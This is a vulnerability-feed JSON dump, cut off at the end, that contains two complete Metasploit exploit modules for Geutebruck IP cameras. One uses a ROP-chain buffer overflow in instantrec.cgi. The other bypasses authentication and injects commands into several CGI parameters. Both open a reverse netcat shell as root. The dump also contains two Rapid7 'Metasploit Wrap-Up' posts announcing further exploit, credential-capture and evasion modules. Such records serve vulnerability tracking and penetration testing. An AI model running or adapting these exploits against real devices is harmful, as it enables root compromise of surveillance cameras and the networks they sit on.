{"lastseen": "2021-12-23T13:19:36", "description": "This Metasploit module exploits a buffer overflow within the 'action' parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions equal to 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-17T00:00:00", "type": "zdt", "title": "Geutebruck instantrec Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33549"], "modified": "2021-09-17T00:00:00", "id": "1337DAY-ID-36768", "href": "https://0day.today/exploit/description/36768", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Geutebruck instantrec Remote Command Execution',\n 'Description' => %q{\n This module exploits a buffer overflow within the 'action'\n parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,\n ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware\n versions 1.12.13.2 and 1.12.14.5.\n Successful exploitation results in remote code execution as the root user.\n },\n\n 'Author' => [\n 'Titouan Lazard - RandoriSec', # Discovery\n 'Ibrahim Ayadhi - RandoriSec' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2021-33549'],\n ['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],\n ['URL', 'http://geutebruck.com'],\n ['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']\n ],\n 'DisclosureDate' => '2021-07-08',\n 'Privileged' => true,\n 'Platform' => %w[unix linux],\n 'Arch' => [ARCH_ARMLE],\n 'Targets' => [\n ['Automatic Target', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'\n },\n 'Notes' => {\n 'Stability' => ['CRASH_SAFE'],\n 'Reliability' => ['REPEATABLE_SESSION'],\n 'SideEffects' => ['ARTIFACTS_ON_DISK']\n }\n )\n )\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])\n ]\n )\n end\n\n def write_payload\n # gadgets\n libc_add = 0x402da000\n system_off = 0x00357fc\n libc_data_off = 0x12c960\n str_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc;\n pop_r0_off = 0x00101de4 # pop r0 pc\n pop_r1_off = 0x0010252c # pop r1 pc\n pop_r4_off = 0x00015164 # pop r4 pc\n system_ = libc_add + system_off\n str_r1 = libc_add + str_r1_off\n pop_r0 = libc_add + pop_r0_off\n pop_r1 = libc_add + pop_r1_off\n pop_r4 = libc_add + pop_r4_off\n add_str = libc_data_off + libc_add + 4\n chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')\n rop = []\n rop += [pop_r4]\n rop += [add_str - 0x14]\n chunks.each_with_index do |chunk, index|\n rop += [pop_r1]\n rop += [chunk]\n rop += [str_r1]\n rop += if index != (chunks.length - 1)\n [add_str - 0x14 + ((index + 1) * 4)]\n else\n [0x41414141]\n end\n end\n rop += [pop_r0]\n rop += [add_str]\n rop += [system_]\n rop.pack('V*')\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Attempting to exploit...\")\n pad_size = 536\n data = Rex::Text.pattern_create(pad_size) + write_payload\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),\n 'vars_post' => {\n 'action' => data\n }\n )\n handler\n end\nend\n", "sourceHref": "https://0day.today/exploit/36768", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-02T22:45:59", "description": "This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.\n", "cvss3": {}, "published": "2021-08-31T23:24:14", "type": "metasploit", "title": "Geutebruck Multiple Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33544", "CVE-2021-33548", "CVE-2021-33550", "CVE-2021-33551", "CVE-2021-33552", "CVE-2021-33553", "CVE-2021-33554"], "modified": "2022-10-01T07:54:59", "id": "MSF:EXPLOIT-LINUX-HTTP-GEUTEBRUCK_CMDINJECT_CVE_2021_335XX-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/geutebruck_cmdinject_cve_2021_335xx/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Geutebruck Multiple Remote Command Execution',\n 'Description' => %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user.\n },\n\n 'Author' => [\n 'Titouan Lazard', # Of RandoriSec - Discovery\n 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module\n 'S\u00e9bastien Charbonnier' # Of RandoriSec - Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2021-33543'],\n ['CVE', '2021-33544'],\n ['CVE', '2021-33548'],\n ['CVE', '2021-33550'],\n ['CVE', '2021-33551'],\n ['CVE', '2021-33552'],\n ['CVE', '2021-33553'],\n ['CVE', '2021-33554'],\n [ 'URL', 'http://geutebruck.com' ],\n [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],\n [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']\n ],\n 'DisclosureDate' => '2021-07-08',\n 'Privileged' => true,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Targets' => [\n [\n 'CVE-2021-33544 - certmngr.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => {\n 'action' => 'createselfcert',\n 'local' => Rex::Text.rand_text_alphanumeric(10..16),\n 'country' => Rex::Text.rand_text_alphanumeric(2),\n 'state' => '$(PLACEHOLDER_CMD)',\n 'organization' => Rex::Text.rand_text_alphanumeric(10..16),\n 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16),\n 'commonname' => Rex::Text.rand_text_alphanumeric(10..16),\n 'days' => Rex::Text.rand_text_numeric(2..4),\n 'type' => Rex::Text.rand_text_numeric(2..4)\n },\n 'uri' => '/../uapi-cgi/certmngr.cgi'\n }\n ],\n [\n 'CVE-2021-33548 - factory.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' },\n 'uri' => '/../uapi-cgi/factory.cgi'\n }\n ],\n [\n 'CVE-2021-33550 - language.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' },\n 'uri' => '/../uapi-cgi/language.cgi'\n }\n ],\n [\n 'CVE-2021-33551 - oem.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => {\n 'action' => 'set',\n 'enable' => 'yes',\n 'environment.lang' => '$(PLACEHOLDER_CMD)'\n },\n 'uri' => '/../uapi-cgi/oem.cgi'\n }\n ],\n [\n 'CVE-2021-33552 - simple_reclistjs.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => {\n 'action' => 'get',\n 'timekey' => Rex::Text.rand_text_numeric(2..4),\n 'date' => '$(PLACEHOLDER_CMD)'\n },\n 'uri' => '/../uapi-cgi/simple_reclistjs.cgi'\n }\n ],\n [\n 'CVE-2021-33553 - testcmd.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' },\n 'uri' => '/../uapi-cgi/testcmd.cgi'\n }\n ],\n [\n 'CVE-2021-33554 - tmpapp.cgi', {\n 'http_method' => 'GET',\n 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' },\n 'uri' => '/../uapi-cgi/tmpapp.cgi'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => '/brand.xml'\n )\n unless res\n print_error('Connection failed!')\n return false\n end\n\n unless res&.body && !res.body.empty?\n print_error('Empty body in the response!')\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at('//firmware').nil?\n print_error('Target did not respond with a XML document containing the \"firmware\" element!')\n return false\n end\n raw_text = res_xml.at('//firmware').text\n if raw_text && raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error('Target responded with a XML document containing the \"firmware\" element but its not a valid version string!')\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!')\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5')\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target['http_method']\n if method == 'GET'\n http_method_vars = 'vars_get'\n else\n http_method_vars = 'vars_post'\n end\n\n http_vars = target['http_vars']\n http_vars.each do |(k, v)|\n if v.include? 'PLACEHOLDER_CMD'\n http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n 'method' => method,\n 'uri' => target['uri'],\n http_method_vars => http_vars\n }\n )\n print_status('Exploit complete, you should get a shell as the root user!')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/geutebruck_cmdinject_cve_2021_335xx.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-09-03T16:57:40", "description": "## Capture Credentials with our new SMB Server\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/metasploit-ascii-1.png)\n\nOur own [Adam Galway](<https://github.com/agalway-r7>) revamped the old SMB capture [module](<https://github.com/rapid7/metasploit-framework/pull/15548>) and now supports NTLMv1 and NTLMv2, as well as SMB1, SMB2 and SMB3. This was possible thanks to [@zeroSteiner](<https://github.com/zeroSteiner>)'s new RubySMB server [implementation](<https://github.com/rapid7/ruby_smb/pull/177>). Metasploit is now able to capture NTLM hashes from any recent Windows releases using the SMB2 and SMB3 dialects, even with encrypted SMB traffic.\n\n## Revenge of the Clones\n\nEarlier this year, an outstanding vulnerability in Git clients was disclosed and identified as [CVE-2021-21300](<https://attackerkb.com/topics/GIyrDyWf9s/cve-2021-21300?referrer=blog>). It allows an attacker to execute scripts on the victim's system when cloning a specially crafted repository onto a case-insensitive file system such as NTFS, HFS+ or APFS. Our own [Shelby Pace](<https://github.com/space-r7>) just added a new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15532>) that leverages this flaw to achieve remote code execution. First, the module creates a fake Git repository and waits for the victim to clone it. This process will deliver a `post-checkout` script with the payload that will be automatically executed upon checkout of the repository.\n\nNote that for this exploit to work, the victim's Git client must support delay-capable clean / smudge filters and symbolic links. The former is enabled by default on Windows through `Git-lfs`.\n\nDon't clone repositories you don't trust!\n\n## Exploiting eBPF on Linux\n\nA new local exploit module that leverages a bug in the Linux eBPF feature was added by [Grant Willcox](<https://github.com/gwillcox-r7>) this week. This vulnerability is identified as [CVE-2021-3490](<https://attackerkb.com/topics/3D6SKZ2Hv2/cve-2021-3490?referrer=blog>) and allows a local attacker to achieve code execution as the root user by conducting an out-of-bounds read and write in the Linux kernel. This is possible due to a flaw in eBPF `verifier`'s verification of ALU32 operations. This module is based on [@chompie1337](<https://github.com/chompie1337>)'s [PoC](<https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490>) code and should work on any vulnerable kernel versions (from 5.7-rc1 prior to 5.13-rc4, 5.12.4, 5.11.21, and \n5.10.37). Note that, at the moment, it has only been tested on Ubuntu 20.04 (Focal Fossa) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 20.10 (Groovy Gorilla) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 21.04 (Hirsute Hippo) 5.11.x kernels prior to 5.11.0-17.18 and Fedora kernel versions 5.x from 5.7.x up to but not including 5.11.20-300. However, the module documentation includes some instructions for porting the exploit over onto other systems.\n\n## New module content (4)\n\n * [Geutebruck Multiple Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15603>) by Ibrahim Ayadhi, S\u00e9bastien Charbonnier, and Titouan Lazard, which exploits [CVE-2021-33554](<https://attackerkb.com/topics/2pz1Pw3KSH/cve-2021-33554?referrer=blog>) \\- A new module has been added which bypasses authentication and exploits CVE-2021-33544, CVE-2021-33548, and CVE-2021-33550-33554 on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the `root` user.\n * [Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE](<https://github.com/rapid7/metasploit-framework/pull/15567>) by Grant Willcox, Manfred Paul, and chompie1337, which exploits ZDI-21-606 - This adds a module that uses @chompie1337's CVE-2021-3490 PoC code to elevate privileges to `root` on affected Linux systems. It's been tested to work on clean installs of Ubuntu 21.04, Ubuntu 20.10, Ubuntu 20.04.02, as well as Fedora running affected versions of the 5.7, 5.8, 5.9, 5.10 and 5.11 kernels.\n * [Git LFS Clone Command Exec](<https://github.com/rapid7/metasploit-framework/pull/15532>) by Johannes Schindelin, Matheus Tavares, and Shelby Pace, which exploits [CVE-2021-21300](<https://attackerkb.com/topics/GIyrDyWf9s/cve-2021-21300?referrer=blog>) \\- An exploit module has been added for CVE-2021-21300, a RCE vulnerability in affected Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems. Additionally, a set of mixins that aid in exploiting Git clients over the Smart HTTP protocol have been added into Metasploit and the code for older Git-related exploits has been updated to utilize some of this new code.\n * [Overhaul SMB auth capture server](<https://github.com/rapid7/metasploit-framework/pull/15548>) from [agalway-r7](<https://github.com/agalway-r7>) \\- This updates the SMB capture server to be compatible with clients using the SMB 2 and SMB 3 dialects. SMB 1 has not been enabled in Windows 10 since v1709 was released in 2017. This allows the module to be compatible with recent releases.\n\n## Enhancements and features\n\n * [#15253](<https://github.com/rapid7/metasploit-framework/pull/15253>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates Metasploit to support URI arguments to set module datastore values. The currently supported protocols are http, smb, mysql, postgres, and ssh.\n * [#15537](<https://github.com/rapid7/metasploit-framework/pull/15537>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds support for Ruby 3\n * [#15582](<https://github.com/rapid7/metasploit-framework/pull/15582>) from [bcoles](<https://github.com/bcoles>) \\- The code for `Msf::Post::Linux::Kernel.unprivileged_bpf_disabled?` has been updated to support new values supported by `kernel.unprivileged_bpf_disabled` which were introduced in Linux kernels since 5.13 and 5.14-rc+HEAD, particularly the value `2` which means `Unprivileged calls to bpf() are disabled`, whereas the value `1` is now used to indicate `Unprivileged calls to bpf() are disabled without recovery`\n * [#15606](<https://github.com/rapid7/metasploit-framework/pull/15606>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Improves Python Meterpreter to gracefully handle unsupported command ids, and cleaning up process objects correctly. Additionally enhances mingw build support for Windows Meterpreter, and now correctly interprets a transport session time of 0 as never expiring.\n * [#15621](<https://github.com/rapid7/metasploit-framework/pull/15621>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updates the Metasploit docker container to additionally include Go as a dependency.\n * [#15623](<https://github.com/rapid7/metasploit-framework/pull/15623>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `creds` command has been updated to support several new features: supporting formatting NetNTLMv1 and NetNTLMv2 hash for both the JtR and Hashcat formatters, filtering hashes based on the realm, not truncating hashes when writing them to a CSV file, filtering based on the JtR format type name, support for applying the same filtering to output files that can be applied when generating the `creds` table, and support for ensuring output consistency when writing output to a file.\n\n## Bugs fixed\n\n * [#15375](<https://github.com/rapid7/metasploit-framework/pull/15375>) from [HynekPetrak](<https://github.com/HynekPetrak>) \\- This PR fixes a bug whereby Metasploit would sometimes crash when remote LDAP servers returned a null character in the base_dn string, and also enhances `modules/auxiliary/gather/ldap_hashdump.rb` to handle sha256 hashes and skip hashes in cases of LK (locked account) and NP (no password) credentials.\n\n * [#15572](<https://github.com/rapid7/metasploit-framework/pull/15572>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR implements a fix to correctly handle quoted console options and whitespace\n\n * [#15573](<https://github.com/rapid7/metasploit-framework/pull/15573>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The `simplify_module` function has been updated so that by default it will not load LHOST/RHOST from the config file and instead use the values set in the options.\n\n * [#15590](<https://github.com/rapid7/metasploit-framework/pull/15590>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- A bug has been fixed that prevented external modules from properly handling the encoding of UTF-8 characters.\n\n * [#15596](<https://github.com/rapid7/metasploit-framework/pull/15596>) from [tomadimitrie](<https://github.com/tomadimitrie>) \\- A bug has been fixed in `docker_credential_wincred` whereby the regex would sometimes match on IP addresses and other invalid entries instead of the expected Docker version string. This has now been fixed by tightening the regex to make it more specific and restrictive.\n\n * [#15628](<https://github.com/rapid7/metasploit-framework/pull/15628>) from [timwr](<https://github.com/timwr>) \\- Ensures the session table is refreshed whenever the sysinfo command is run, and whenever stdapi is loaded manually. This should also fix a minor bug where if you run an exploit on an existing session, the session information never gets updated (e.g the username from User -> SYSTEM). Now it's refreshed when you run `meterpreter > sysinfo`.\n\n * [#15629](<https://github.com/rapid7/metasploit-framework/pull/15629>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Fixes a regression issue where msfconsole crashed on startup when running on a Windows environments\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.2...6.1.3](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-26T11%3A21%3A14-05%3A00..2021-09-02T10%3A13%3A16-05%3A00%22>)\n * [Full diff 6.1.2...6.1.3](<https://github.com/rapid7/metasploit-framework/compare/6.1.2...6.1.3>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T16:30:26", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300", "CVE-2021-33544", "CVE-2021-33548", "CVE-2021-33550", "CVE-2021-33554", "CVE-2021-3490"], "modified": "2021-09-03T16:30:26", "id": "RAPID7BLOG:87258C1DADE2252F01C88F01B6B88F78", "href": "https://blog.rapid7.com/2021/09/03/metasploit-wrap-up-128/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-24T21:21:53", "description": "## Vulnerability is in the eye of the beholder\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/metasploit-blg-3-copy.png)\n\nExploiting firmware authored by [UDP Technology](<https://vcatechnology.com/udp-technology/>) and provided to multiple large OEMs (including Geutebruck), community contributor [TrGFxX](<https://github.com/TrGFxX>) has authored a [neat module](<https://github.com/rapid7/metasploit-framework/pull/15604>) that allows RCE as root on machines running the web interface of the Geutebruck G-Cam and G-Code products. For more information on the vulnerability check out the [CISA advisory](<https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03>).\n\n## OpManager exploit is OP plz nerf\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) authored a [module](<https://github.com/rapid7/metasploit-framework/pull/15670>) implementing both an [exploit](<https://attackerkb.com/topics/uFkcCFlzIW/cve-2020-28653?referrer=blog>) and [patch bypass](<https://attackerkb.com/topics/VnQHtC1Y1N/cve-2021-3287?referrer=blog>) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. This module allows payload execution as either `NT AUTHORITY\\SYSTEM` on Windows or root on Linux. On top of this new module, [zeroSteiner](<https://github.com/zeroSteiner>) made improvements to help utilize the increasingly essential [YSoSerial tool](<https://github.com/frohoff/ysoserial>). You should definitely check it out if you're interested in exploring other Java deserialization vulns.\n\n## Putting the Win in WinRM\n\nIn a big win for Metasploit, community contributor [smashery](<https://github.com/smashery>) finished off their month-long effort to get [fully functional shells working across WinRM!](<https://github.com/rapid7/metasploit-framework/pull/15632>) These new sessions support post modules, NTLMSSP authentication, and are also able to run without a payload in remote memory, making these sessions pretty hard to detect. This is a major improvement over the previous WinRM implementation that only supported execution of a single command, so huge thanks again to [smashery](<https://github.com/smashery>).\n\n## You can tell a lot about a protocol from its handshake\n\nIn one final noteworthy addition, [smashery](<https://github.com/smashery>) has once again come through with a [PR](<https://github.com/rapid7/metasploit-framework/pull/15696>) that significantly improves our RDP library. Metasploit users can now capture the NETBIOS computer name, NETBIOS domain name, DNS computer name, DNS domain name, and OS version from the NTLM handshake carried out over RDP, and our rdp_scanner module has been updated to display this info to all the RDP sniffers out there.\n\n## New module content (3)\n\n * [Direct windows syscall evasion technique](<https://github.com/rapid7/metasploit-framework/pull/15506>) by [Yaz](<https://github.com/kensh1ro>) \\- This adds a new evasion module that uses direct syscalls on 64-bit versions of Windows to evade detection.\n * [Geutebruck instantrec Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15604>) by [Ibrahim Ayadhi - RandoriSec](<https://twitter.com/ayadhiibrahim?lang=en>) and [Titouan Lazard](<https://twitter.com/titouanlazard?lang=en>) \\- RandoriSec, which exploits [CVE-2021-33549](<https://attackerkb.com/topics/kCZ3M8XTgH/cve-2021-33549?referrer=blog>) \\- This module exploits an unauthenticated buffer overflow vulnerability within the `action` parameter of the `/uapi-cgi/instantrec.cgi` endpoint in various Geutebruck G-Cam and G-Code devices. The exploit results in code execution as the `root` user on target devices.\n * [ManageEngine OpManager SumPDU Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15670>) by [Johannes Moritz](<https://www.radicallyopensecurity.com/our-team/pentester/JohannesMoritz.html>), [Robin Peraglie](<https://www.linkedin.com/in/robin-peraglie-aa4433161/?originalSubdomain=de>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-3287](<https://attackerkb.com/topics/VnQHtC1Y1N/cve-2021-3287?referrer=blog>) \\- The `exploit/multi/http/opmanager_sumpdu_deserialization` module implements an exploit (CVE-2020-28653) and patch bypass (CVE-2021-3287) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. Arbitrary code execution as the `NT AUTHORITY\\SYSTEM` user on Windows or the `root` user on Linux is achieved by sending a PDU to the SmartUpdateManager handler.\n\n## Enhancements and features\n\n * [#15684](<https://github.com/rapid7/metasploit-framework/pull/15684>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This improves interactive shell performance for pasted user input.\n * [#15696](<https://github.com/rapid7/metasploit-framework/pull/15696>) from [smashery](<https://github.com/smashery>) \\- This updates the RDP scanner module to extract and show additional information gathered from the NTLM handshake used for Network Level Authentication (NLA).\n * [#15632](<https://github.com/rapid7/metasploit-framework/pull/15632>) from [smashery](<https://github.com/smashery>) \\- This improves Metasploit's WinRM capabilities by allowing shell sessions to be established over the protocol. The shell sessions are interactive and are usable with post modules.\n\n## Bugs fixed\n\n * [#15600](<https://github.com/rapid7/metasploit-framework/pull/15600>) from [agalway-r7](<https://github.com/agalway-r7>) \\- This fixes an issue with encrypted payloads during session setup. The logic that gathers session info is now located in the bootstrap method, which ensures that this functionality is always carried out before any commands are sent.\n * [#15666](<https://github.com/rapid7/metasploit-framework/pull/15666>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue found in Meterpreter's `download` functionality where downloading a file with a name containing unicode characters would fail due to incompatible encoding.\n * [#15679](<https://github.com/rapid7/metasploit-framework/pull/15679>) from [nvn1729](<https://github.com/nvn1729>) \\- This fixes a bug where the tomcat_mgr_upload module was not correctly undeploying the app after exploitation occurred.\n * [#15686](<https://github.com/rapid7/metasploit-framework/pull/15686>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a crash in `msfrpc` that occurs due to the `exploit/linux/misc/saltstack_salt_unauth_rce` module's `MINIONS` option default being a regex instead of a string.\n * [#15695](<https://github.com/rapid7/metasploit-framework/pull/15695>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in the `exploit/unix/local/setuid_nmap` module and adds logging to print the result of the exploit's last command so the user knows what happened in the event of a failure.\n * [#15697](<https://github.com/rapid7/metasploit-framework/pull/15697>) from [smashery](<https://github.com/smashery>) \\- This updates the HTTP NTLM information enumeration module to use the `Net::NTLM` library for consistent data processing without a custom parser.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.6...6.1.7](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-15T14%3A13%3A18-05%3A00..2021-09-23T09%3A41%3A25-05%3A00%22>)\n * [Full diff 6.1.6...6.1.7](<https://github.com/rapid7/metasploit-framework/compare/6.1.6...6.1.7>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": 